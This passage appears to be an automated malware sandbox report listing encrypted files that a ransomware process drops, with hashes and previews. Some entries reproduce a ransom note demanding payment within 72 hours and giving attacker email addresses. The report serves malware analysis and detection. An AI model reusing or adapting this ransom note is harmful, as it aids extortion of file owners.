                                                                                                    Preview:7.......r.*3...q.C/._.f....H.....il.ct..v.....o.j.E.V.o...3..@....6..<c..aK..QB8.EdrO.. 7f...........Ms...TJ.o......NA....."}o..e'C..3.S37>.......R...{...=.....v.N.R..N.Y.aj.yix..I9...*...G........lJlV...^..f'..|H..'. ....].....&.......J...Eyg.%*a..:g..CX.!D2.f.).....,\......r9?...x5|.+......q=..k.#*..}.\0._...>.....3J.0k..?..M..*........A.G.....5x..)..n.r.`...n.]...!+L%.H.L.|cs.1+z.<P4ij^..BW.e$p...1........j..B...(l......o....d^...V..l\..........0...lc...w...8.}....;...)...\v1.)...@V+....5..P...zX..]...s../..9.B....n}..Pn!_.XAqQN.2.V.ux@.VM "...R.'YS.U..e.{q'.o..H..)!6g.9E..v1.S...0'n..,.x..e.+.....C......b...-.1....P.....$[p-.-D0.A.*..I\j.ZYR....l.Z.c..z..._.]....)[D.O.^^>......k.)....*......q...C...>;.W.....+..R....Y:...rc..e.*.e....1B.1hU..1...9..z.S..@Q.N3...-..]u.J..">A..<{.>...@.A..N.\n3..V8h.....YX5..K...(._.."..#.G..y...L....p..l..x....7..S0..+..O.X...*.X..>j9[. ...fD.Bx.$..p.q....Sv.H....<N.8.@-...-....n.g..K.._BL.w.VB. m[x.Of..X.|X..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1388
                                                                                                    Entropy (8bit):7.849859943661051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dhpsertiuIEJ3AcHuQ8aXi6nrA2zRHCwWmrbD5O12Ch48dil4Ye+B:me5J3AcORh6nr7jbotLK4aB
                                                                                                    MD5:CDD2AF745399974051344870F63BBB61
                                                                                                    SHA1:113380D7682ECE97C79D6C21E628268A60756F35
                                                                                                    SHA-256:3CF831C4B6FB59833AA983267A2358639CBEE3FCA9DA037E420B5E33CB973A39
                                                                                                    SHA-512:57EA05012C5812C8D958EC8F8ED8EBF874125A94E30BB31DD6F6FB03858E4F0057F50E371D0B9B6337BC8AB9E0C22FADF5D04FB22D0E17E1A48C16766D67FFA4
                                                                                                    Malicious:true
                                                                                                    Preview:..Q&.`b..&;.fm.........P:...1m_'.....0..P...#.....>..>oq..L...:.].#!2R]C....G}...h....</.+.V}...{M...Al.../...v..bF..R.....F..'........mG........?.v`n....1ZFE.x..5S...L5.a.A..a.'c..y..........D....H_.w..c..(I%...xN.$..L.MZ.ZV..a.:..d..dZ.MKe...6.e..!....h..c..$.9......).b/.*..!...i...}.A..*...Jv1...c4....;..e..D..J?..M.3..IPI =.{.h....G...j....S..[..-...;.wV.QB.e.3....}...*(...........,R.*...)..:...Z...x...cv{w...U..0S.SHMH..8..6...N.Y{"6...#....`a..-.:......###Q....8....$....-.T.....L...Pi.I"V.r8...?$..A...i.........~[.....).RW5.wI.u_..<.R.Ru.$....W...oV..A/...|....cx!G)3..#...=#.....m..Y..UB.......u..&./..[-.+s...].......n.....W...,a.+.3.!.......b...B..)....:..SO.w.5....Z...2....)i\..5.C7.~.v.k....V....a.....'...d2.....B.S....B..:"..a..e......[..S..,...m.....;Uz.X"..o\2......qC...N%).VS....B... ._...W.../.7.&..+.....$....0@...Eu........v2..;...V...,.......(<.Ok..~...b..g......../K.@....:.o=...,..N..Gc....7........f$....v....7.Mn.9D
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1388
                                                                                                    Entropy (8bit):7.849859943661051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dhpsertiuIEJ3AcHuQ8aXi6nrA2zRHCwWmrbD5O12Ch48dil4Ye+B:me5J3AcORh6nr7jbotLK4aB
                                                                                                    MD5:CDD2AF745399974051344870F63BBB61
                                                                                                    SHA1:113380D7682ECE97C79D6C21E628268A60756F35
                                                                                                    SHA-256:3CF831C4B6FB59833AA983267A2358639CBEE3FCA9DA037E420B5E33CB973A39
                                                                                                    SHA-512:57EA05012C5812C8D958EC8F8ED8EBF874125A94E30BB31DD6F6FB03858E4F0057F50E371D0B9B6337BC8AB9E0C22FADF5D04FB22D0E17E1A48C16766D67FFA4
                                                                                                    Malicious:false
                                                                                                    Preview:..Q&.`b..&;.fm.........P:...1m_'.....0..P...#.....>..>oq..L...:.].#!2R]C....G}...h....</.+.V}...{M...Al.../...v..bF..R.....F..'........mG........?.v`n....1ZFE.x..5S...L5.a.A..a.'c..y..........D....H_.w..c..(I%...xN.$..L.MZ.ZV..a.:..d..dZ.MKe...6.e..!....h..c..$.9......).b/.*..!...i...}.A..*...Jv1...c4....;..e..D..J?..M.3..IPI =.{.h....G...j....S..[..-...;.wV.QB.e.3....}...*(...........,R.*...)..:...Z...x...cv{w...U..0S.SHMH..8..6...N.Y{"6...#....`a..-.:......###Q....8....$....-.T.....L...Pi.I"V.r8...?$..A...i.........~[.....).RW5.wI.u_..<.R.Ru.$....W...oV..A/...|....cx!G)3..#...=#.....m..Y..UB.......u..&./..[-.+s...].......n.....W...,a.+.3.!.......b...B..)....:..SO.w.5....Z...2....)i\..5.C7.~.v.k....V....a.....'...d2.....B.S....B..:"..a..e......[..S..,...m.....;Uz.X"..o\2......qC...N%).VS....B... ._...W.../.7.&..+.....$....0@...Eu........v2..;...V...,.......(<.Ok..~...b..g......../K.@....:.o=...,..N..Gc....7........f$....v....7.Mn.9D
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1127
                                                                                                    Entropy (8bit):7.830113508196423
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PA6V21XcA+YXbjo6pQbpBNVd25h9rttDpCyp6yYW7qpiNSb27Uzg:PA+8Xbjo8QbpBXd4FDp6jkA0
                                                                                                    MD5:21D29B8CE9DE492657C0DA576D614EC3
                                                                                                    SHA1:1C0F1545BC9370C4CEF6AE462DD8645238DB24D2
                                                                                                    SHA-256:7D8D2A9294B0F282B39F9477CCFC7201F01C1F7DFD2968961F9BD1146CFC2C33
                                                                                                    SHA-512:D19B3561FFF5E09E461707CE883FA8A850680FA0D030E2E7C9AA869E03C3F5569928AE119DF0F23F715040DCBB12B4F0381E7827F35C69EF618BC7C746E51067
                                                                                                    Malicious:true
                                                                                                    Preview:z13(.].X....,.j...-.o............{......,.((u...C.n..CK..^..(...4_e4.:8\......T#...5..:....S...(~\.!...K..c..X....M.n.....D...r?.o...o....^'........F.=e#Q..c.-..........>5..GFj....x.w.../2.{.E....iBO...yA|..VH.j6..!P..H...).^.....=.ft.....q%Q........S......\7..[.p.h.-C..k..K.!.2.h..T..4...~.e.!...;u..z.O......Ni.v.9..c....:..l.}1...p.Q...N..f.|....(Eo...v.....k.-3.2.x.s......rm,.Sg..b.iT.=..{gw.r#..:....D.1...E..P..g.B.^......1.Fe(.?Ez.m.5....6.a.|.Y.l\^.v3...I.0V....$.Z$..$....O.>20zd.?..Q..U..k.p..M..ey.6...^..;....*../xd...1....C*.=..jfZ.i.bP..>.....yf..,k..RX.R..yq_..n.G..\...b.)"..;.]gC..P.^.......Ho.k....>C.2:...H2.=I.....S.].>>.t.z.s.....MEu!}......?(....<.g..kZ...M..?........k.......3.....D.C...p.hS.3.,/q...]..d2.C~.!.F...c.(.T...c......Z.U..J.........b*.A....,.....G.q.27d9df507"}}}.#.....G6&ZG.....*..Y.....bq.&.[.;.Ku..<.f..).,B.....<...+...UM.R...y.q....Y[E8.Qk....i..7..C.......6.s+7)...W..e.\.G....UE[.^.6u..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1127
                                                                                                    Entropy (8bit):7.830113508196423
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PA6V21XcA+YXbjo6pQbpBNVd25h9rttDpCyp6yYW7qpiNSb27Uzg:PA+8Xbjo8QbpBXd4FDp6jkA0
                                                                                                    MD5:21D29B8CE9DE492657C0DA576D614EC3
                                                                                                    SHA1:1C0F1545BC9370C4CEF6AE462DD8645238DB24D2
                                                                                                    SHA-256:7D8D2A9294B0F282B39F9477CCFC7201F01C1F7DFD2968961F9BD1146CFC2C33
                                                                                                    SHA-512:D19B3561FFF5E09E461707CE883FA8A850680FA0D030E2E7C9AA869E03C3F5569928AE119DF0F23F715040DCBB12B4F0381E7827F35C69EF618BC7C746E51067
                                                                                                    Malicious:false
                                                                                                    Preview:z13(.].X....,.j...-.o............{......,.((u...C.n..CK..^..(...4_e4.:8\......T#...5..:....S...(~\.!...K..c..X....M.n.....D...r?.o...o....^'........F.=e#Q..c.-..........>5..GFj....x.w.../2.{.E....iBO...yA|..VH.j6..!P..H...).^.....=.ft.....q%Q........S......\7..[.p.h.-C..k..K.!.2.h..T..4...~.e.!...;u..z.O......Ni.v.9..c....:..l.}1...p.Q...N..f.|....(Eo...v.....k.-3.2.x.s......rm,.Sg..b.iT.=..{gw.r#..:....D.1...E..P..g.B.^......1.Fe(.?Ez.m.5....6.a.|.Y.l\^.v3...I.0V....$.Z$..$....O.>20zd.?..Q..U..k.p..M..ey.6...^..;....*../xd...1....C*.=..jfZ.i.bP..>.....yf..,k..RX.R..yq_..n.G..\...b.)"..;.]gC..P.^.......Ho.k....>C.2:...H2.=I.....S.].>>.t.z.s.....MEu!}......?(....<.g..kZ...M..?........k.......3.....D.C...p.hS.3.,/q...]..d2.C~.!.F...c.(.T...c......Z.U..J.........b*.A....,.....G.q.27d9df507"}}}.#.....G6&ZG.....*..Y.....bq.&.[.;.Ku..<.f..).,B.....<...+...UM.R...y.q....Y[E8.Qk....i..7..C.......6.s+7)...W..e.\.G....UE[.^.6u..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.888420215256392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WpisGHti3AHl0l885xgidXrGscPtXpzA4Yc2:Wp/GM3u6d5xgidKv1Yc2
                                                                                                    MD5:4EAE87A5D88B1700285204DD232380F7
                                                                                                    SHA1:58B75B08217BD3E7ED6A77CDC5BB599F8EFD298F
                                                                                                    SHA-256:8117EA0472D5DD4DCC007A7ADA6D8780BB1F3721DABD17CF043C297BE0ADB43C
                                                                                                    SHA-512:9C80175AD937A9D046976D491AF07707F07DB437997EEA3E40CFC4B0FBFC5AC2CA86F364ED87B0DF3EE76B05C50D993923C839CC4239DC612F21EB493580D894
                                                                                                    Malicious:true
                                                                                                    Preview:3.l.....W.}.......;t.X.1..,.a<8.)#.......q.o...x .N.\.0.O..."....K.1..Iy..G!]g..M......5.q.hN.......'..;.$T.4.O....W.....6ZY..(..1. PT.R+....'....C.ba..C.3.._X.[.t...KR.........%.........N*..]mu..^vt..Z.c....>.....q& .%.3....Yb..6.-.8.N.[v..,...E...c......4lv;^auD.L.^....$.{c.X.$.....e.....)b.R..1.:!..`..>.Y....}J..7=3#(.Rr.q.T.S3..hB-L.*wIYDx..&.}."...".*.U;.....{..k-......K.H3.:.....A..O.7..8 .1-.,.UM<.......z-..f.sC...J..r]......w.X_a..-2.&.Y(I.d.{.|.... ..s*....VR`....?...%<.....f.Z../.EAb:A....f..3.$.p..mW.+../.C....}LuM...q...uN..N4..,...-X.zU..x.M.'BWw.k....k~.,D.Z...0L.`.....LPQ...~..|l...g.r.1....u.K..x.ZEH..t.~..ka...<...t......n{s.3....D3.=..P..O@|...Qal.F.._<]V...y...G.g..&..f.....),a$.....j..".0.....&./rB.;...........M.1.T92....H...v.%.......]..:k.I.....bI....o..".q..ZS..k...(..'..L....d.t<e..........SM..=.mN...Y..3.....G....63....ag*.F.?...B]K.z#"..(.s=au.i..VD......&......(.7..s.zu-.R= .U.P..0c.....a...O..5....3..2].}....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.888420215256392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WpisGHti3AHl0l885xgidXrGscPtXpzA4Yc2:Wp/GM3u6d5xgidKv1Yc2
                                                                                                    MD5:4EAE87A5D88B1700285204DD232380F7
                                                                                                    SHA1:58B75B08217BD3E7ED6A77CDC5BB599F8EFD298F
                                                                                                    SHA-256:8117EA0472D5DD4DCC007A7ADA6D8780BB1F3721DABD17CF043C297BE0ADB43C
                                                                                                    SHA-512:9C80175AD937A9D046976D491AF07707F07DB437997EEA3E40CFC4B0FBFC5AC2CA86F364ED87B0DF3EE76B05C50D993923C839CC4239DC612F21EB493580D894
                                                                                                    Malicious:false
                                                                                                    Preview:3.l.....W.}.......;t.X.1..,.a<8.)#.......q.o...x .N.\.0.O..."....K.1..Iy..G!]g..M......5.q.hN.......'..;.$T.4.O....W.....6ZY..(..1. PT.R+....'....C.ba..C.3.._X.[.t...KR.........%.........N*..]mu..^vt..Z.c....>.....q& .%.3....Yb..6.-.8.N.[v..,...E...c......4lv;^auD.L.^....$.{c.X.$.....e.....)b.R..1.:!..`..>.Y....}J..7=3#(.Rr.q.T.S3..hB-L.*wIYDx..&.}."...".*.U;.....{..k-......K.H3.:.....A..O.7..8 .1-.,.UM<.......z-..f.sC...J..r]......w.X_a..-2.&.Y(I.d.{.|.... ..s*....VR`....?...%<.....f.Z../.EAb:A....f..3.$.p..mW.+../.C....}LuM...q...uN..N4..,...-X.zU..x.M.'BWw.k....k~.,D.Z...0L.`.....LPQ...~..|l...g.r.1....u.K..x.ZEH..t.~..ka...<...t......n{s.3....D3.=..P..O@|...Qal.F.._<]V...y...G.g..&..f.....),a$.....j..".0.....&./rB.;...........M.1.T92....H...v.%.......]..:k.I.....bI....o..".q..ZS..k...(..'..L....d.t<e..........SM..=.mN...Y..3.....G....63....ag*.F.?...B]K.z#"..(.s=au.i..VD......&......(.7..s.zu-.R= .U.P..0c.....a...O..5....3..2].}....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1068
                                                                                                    Entropy (8bit):7.812529440273856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KgGkI7FDR53PGkOnZYxquDXfrRJPK6kU/H6Ge52OOm3pfjo:KNkQFDR5/GkmZYxquL/yiH6Ge5Nk
                                                                                                    MD5:CBA042D6C52F692F4812E74278D7F427
                                                                                                    SHA1:B6DA23AEDA9798A004E705953FA2514FDEF268AA
                                                                                                    SHA-256:9E6AD4BDEE343E8142026230559E330037C868FAC6F5975FCD976AAEA0ECB3DA
                                                                                                    SHA-512:9756E4B991EFEDB7698D07FA58D21BF323768B71A6A274401D9627A882BB89472182F177E650526D2F43B4B9476D90F2A53D382F038B93FC5D380AE58AA175BB
                                                                                                    Malicious:true
                                                                                                    Preview:..p..ha..cZP.........Ll&.p.!z~.,...$}.5...D.AI..2..I.|#S.>..U.b.p.K.Z2o....O.5pm.$2.c./.....^.D6.....{.h...z.....p.*.wy.....8..{9...Z.....o...~j......4....:h.^.(...^....-..2#&y;..y..)8.|...&.#.8.F.....>P......U5~^.N..T;q.....-....'..w.~....r."..c..cj.8..x>...ic.I...(.L...H.D.`..'g`x..y...k.=..H..u.....-...h....%..Y.7.v.`..k.WB..o...@.Q....$...j..Q,..X..NLV/...3..d...E..AQ.y......W.i...Z....*L.2r.....>.._.m.. m..<...~..z...#.r.2k.....4:Vi...qK.]s.@..YS.3~......B2....J6..QX.oF.E.~C.BUc."..>...... ...s*Q..v...S.`)..*4..''..;.@.!p...p..'...V/j_..u...../Y......J0Z..;j<.qZ...b..s.j..5^..b...@]W..(K..z.vH.:....#.p.{L.Q;t..C.*Uy...O.&m..l:K........{... &5...A..-^...kh.v..R."kh.......^F.....}.....9a......\j.....nyO*........K.^.T......-...X..fZ..j...K....z..B0...uV..i...b}}...S..({.2Z;.K.$......Z~v.P"......l..H..q.X....n?.c.XQ.....ha.E.Q!{.'^...Y........y..HL..,.M...{q.S..G..ir-b.w9.t3..`........l?_.F.[..u....-!dO...cc..[.D....(&C}.B:....^.:.&......37..3....d.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1068
                                                                                                    Entropy (8bit):7.812529440273856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KgGkI7FDR53PGkOnZYxquDXfrRJPK6kU/H6Ge52OOm3pfjo:KNkQFDR5/GkmZYxquL/yiH6Ge5Nk
                                                                                                    MD5:CBA042D6C52F692F4812E74278D7F427
                                                                                                    SHA1:B6DA23AEDA9798A004E705953FA2514FDEF268AA
                                                                                                    SHA-256:9E6AD4BDEE343E8142026230559E330037C868FAC6F5975FCD976AAEA0ECB3DA
                                                                                                    SHA-512:9756E4B991EFEDB7698D07FA58D21BF323768B71A6A274401D9627A882BB89472182F177E650526D2F43B4B9476D90F2A53D382F038B93FC5D380AE58AA175BB
                                                                                                    Malicious:false
                                                                                                    Preview:..p..ha..cZP.........Ll&.p.!z~.,...$}.5...D.AI..2..I.|#S.>..U.b.p.K.Z2o....O.5pm.$2.c./.....^.D6.....{.h...z.....p.*.wy.....8..{9...Z.....o...~j......4....:h.^.(...^....-..2#&y;..y..)8.|...&.#.8.F.....>P......U5~^.N..T;q.....-....'..w.~....r."..c..cj.8..x>...ic.I...(.L...H.D.`..'g`x..y...k.=..H..u.....-...h....%..Y.7.v.`..k.WB..o...@.Q....$...j..Q,..X..NLV/...3..d...E..AQ.y......W.i...Z....*L.2r.....>.._.m.. m..<...~..z...#.r.2k.....4:Vi...qK.]s.@..YS.3~......B2....J6..QX.oF.E.~C.BUc."..>...... ...s*Q..v...S.`)..*4..''..;.@.!p...p..'...V/j_..u...../Y......J0Z..;j<.qZ...b..s.j..5^..b...@]W..(K..z.vH.:....#.p.{L.Q;t..C.*Uy...O.&m..l:K........{... &5...A..-^...kh.v..R."kh.......^F.....}.....9a......\j.....nyO*........K.^.T......-...X..fZ..j...K....z..B0...uV..i...b}}...S..({.2Z;.K.$......Z~v.P"......l..H..q.X....n?.c.XQ.....ha.E.Q!{.'^...Y........y..HL..,.M...{q.S..G..ir-b.w9.t3..`........l?_.F.[..u....-!dO...cc..[.D....(&C}.B:....^.:.&......37..3....d.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895848694052735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Eij3btVA8BbE1h0eVg4RDDPOEfLAIeqBycuXcxMtOA:hj3HA8xE1fg4JPOytuXftOA
                                                                                                    MD5:85923B5A754AF344F030528C9CAA5012
                                                                                                    SHA1:EB603370D6561DB26103039A1E8A2A5AA4D994AC
                                                                                                    SHA-256:CAB736F90B8159A6571506935CDCF45644E7FA8EC193E955FB2FDFFBEE042BD8
                                                                                                    SHA-512:7C98E3F0B620974A55C97771D8766B87E107EFC3395F20AE6E2BC7B094B0571C9D35C367FD40EB62AE67D7B6C0765C8CD728871DE9A8DD97FA7867E3F769B0E4
                                                                                                    Malicious:true
                                                                                                    Preview:.R.......v..V.L..9a.e...P{..wk.....\y.JD...K.,.jb6~...8P|...q+!u$Ti..ng..j...d.]0..[.....V...U...L.<.~.^....F.I..H.4...o]...x>S@*..r.f..8d..X.#6iK.i.4.....n.n.d.m..x:.t2...1!.d.[w...:..K?.?....=.Ut-...3.E._..L..9R.?..}.G.k...l..E.O..e"."~.....kV.H.G.......O."u"..f..=..Q...K....P.. .yL.WT...$....En.[.0O.t:...Uxt*;....E.%....Tb....#......0B.V.Z@........X....At.3...c..Q......L#.....U.W-.V.&.........\*6.K.<.3d.cV."m.N......Zc.T.m..6.5/*....j..I...a..\...".p..B...-v.].Ub..`7.+=.D....@.M8...vJ.H.sW?Nll<...O..w3+.z.zB.^..f)..r.....V..F.^.14t.n.N.*...T.R4....0./N....=.......>.y.dS'.oP...Pu..V$.. ...f......f5......m.[..%..%......f...\.P......I7ko..C>..-.........?....U...W.....A...... /.......^..].6.?...Eo....t..>mgG...*..h...Rm.e,...^.Q.j....~...{J...J.W...xj...#.."...]...D..GP.....&.RR.......k...YG..e..*.>d....q?H..y$....G......@...vR..!.5.........0Gv.x......._........J...~K5..u...Hh&i..b........4.].^("..h.Kvj[^.g......i.;.m5....d2.K...(
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1824
                                                                                                    Entropy (8bit):7.895848694052735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Eij3btVA8BbE1h0eVg4RDDPOEfLAIeqBycuXcxMtOA:hj3HA8xE1fg4JPOytuXftOA
                                                                                                    MD5:85923B5A754AF344F030528C9CAA5012
                                                                                                    SHA1:EB603370D6561DB26103039A1E8A2A5AA4D994AC
                                                                                                    SHA-256:CAB736F90B8159A6571506935CDCF45644E7FA8EC193E955FB2FDFFBEE042BD8
                                                                                                    SHA-512:7C98E3F0B620974A55C97771D8766B87E107EFC3395F20AE6E2BC7B094B0571C9D35C367FD40EB62AE67D7B6C0765C8CD728871DE9A8DD97FA7867E3F769B0E4
                                                                                                    Malicious:false
                                                                                                    Preview:.R.......v..V.L..9a.e...P{..wk.....\y.JD...K.,.jb6~...8P|...q+!u$Ti..ng..j...d.]0..[.....V...U...L.<.~.^....F.I..H.4...o]...x>S@*..r.f..8d..X.#6iK.i.4.....n.n.d.m..x:.t2...1!.d.[w...:..K?.?....=.Ut-...3.E._..L..9R.?..}.G.k...l..E.O..e"."~.....kV.H.G.......O."u"..f..=..Q...K....P.. .yL.WT...$....En.[.0O.t:...Uxt*;....E.%....Tb....#......0B.V.Z@........X....At.3...c..Q......L#.....U.W-.V.&.........\*6.K.<.3d.cV."m.N......Zc.T.m..6.5/*....j..I...a..\...".p..B...-v.].Ub..`7.+=.D....@.M8...vJ.H.sW?Nll<...O..w3+.z.zB.^..f)..r.....V..F.^.14t.n.N.*...T.R4....0./N....=.......>.y.dS'.oP...Pu..V$.. ...f......f5......m.[..%..%......f...\.P......I7ko..C>..-.........?....U...W.....A...... /.......^..].6.?...Eo....t..>mgG...*..h...Rm.e,...^.Q.j....~...{J...J.W...xj...#.."...]...D..GP.....&.RR.......k...YG..e..*.>d....q?H..y$....G......@...vR..!.5.........0Gv.x......._........J...~K5..u...Hh&i..b........4.].^("..h.Kvj[^.g......i.;.m5....d2.K...(
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):7.477303415598996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:nGIt7hXzZrq7Gsh6ysquZ6Zx3t2L0JO+E+MXniBBscfln:n/a7GszDZxtnJO+wjcfl
                                                                                                    MD5:BFE6C24FA1BD78BF29FCF87BAACB99AC
                                                                                                    SHA1:76E7F27CA51FD1D1C73EA9D2FDB1921638A0A006
                                                                                                    SHA-256:5CE04C752BE52EEDF1E319CEB61DBC42B4C5143132D669EC5C1742997E5337B1
                                                                                                    SHA-512:A4CBD10812E78F40107763CED7B8A1EB63A5E779EDA3BF93A534517BE8D4B7A1877B404D4B8B3260234E6A0FFAB024879DA0C2B6DE9D2EB614D82F785E9D3C7F
                                                                                                    Malicious:true
                                                                                                    Preview:.T..Y.8...."........U9A.h..'.(aR......n-...]Ux...`.kl....ll../.}:i#.!....R^..%/......RF...s.O.W.......(......HfX.E.....nB:.0-XS..."...:......yu....h.aL..}@.b!.'.iu.D.7..M(.,.`......Q...........5.....L.n1u..........m..........|.g.....P.....d.{O.<..)P..U....J.{h..b.B...l....NCP.......Z..~..}.J.d.L..|.K......x=De.L}.#?#.mL.........P.C..{U...V.}.P.....a.2.U.l..M.....f.%..O.Y..B.08J....A. z6]G.U.R..CY0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):7.477303415598996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:nGIt7hXzZrq7Gsh6ysquZ6Zx3t2L0JO+E+MXniBBscfln:n/a7GszDZxtnJO+wjcfl
                                                                                                    MD5:BFE6C24FA1BD78BF29FCF87BAACB99AC
                                                                                                    SHA1:76E7F27CA51FD1D1C73EA9D2FDB1921638A0A006
                                                                                                    SHA-256:5CE04C752BE52EEDF1E319CEB61DBC42B4C5143132D669EC5C1742997E5337B1
                                                                                                    SHA-512:A4CBD10812E78F40107763CED7B8A1EB63A5E779EDA3BF93A534517BE8D4B7A1877B404D4B8B3260234E6A0FFAB024879DA0C2B6DE9D2EB614D82F785E9D3C7F
                                                                                                    Malicious:false
                                                                                                    Preview:.T..Y.8...."........U9A.h..'.(aR......n-...]Ux...`.kl....ll../.}:i#.!....R^..%/......RF...s.O.W.......(......HfX.E.....nB:.0-XS..."...:......yu....h.aL..}@.b!.'.iu.D.7..M(.,.`......Q...........5.....L.n1u..........m..........|.g.....P.....d.{O.<..)P..U....J.{h..b.B...l....NCP.......Z..~..}.J.d.L..|.K......x=De.L}.#?#.mL.........P.C..{U...V.}.P.....a.2.U.l..M.....f.%..O.Y..B.08J....A. z6]G.U.R..CY0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):317
                                                                                                    Entropy (8bit):7.29672527944937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YWPQ1sj8W/0jqlULBgZy0bDDPYh07kLmBAQYg8ohGKKFMy9VP/lGhXLNIhNSn:YvM8W8jqvDDPYh06mlYKIlGUSn
                                                                                                    MD5:2A9DAC70BB85F281B67C9FEE606098EE
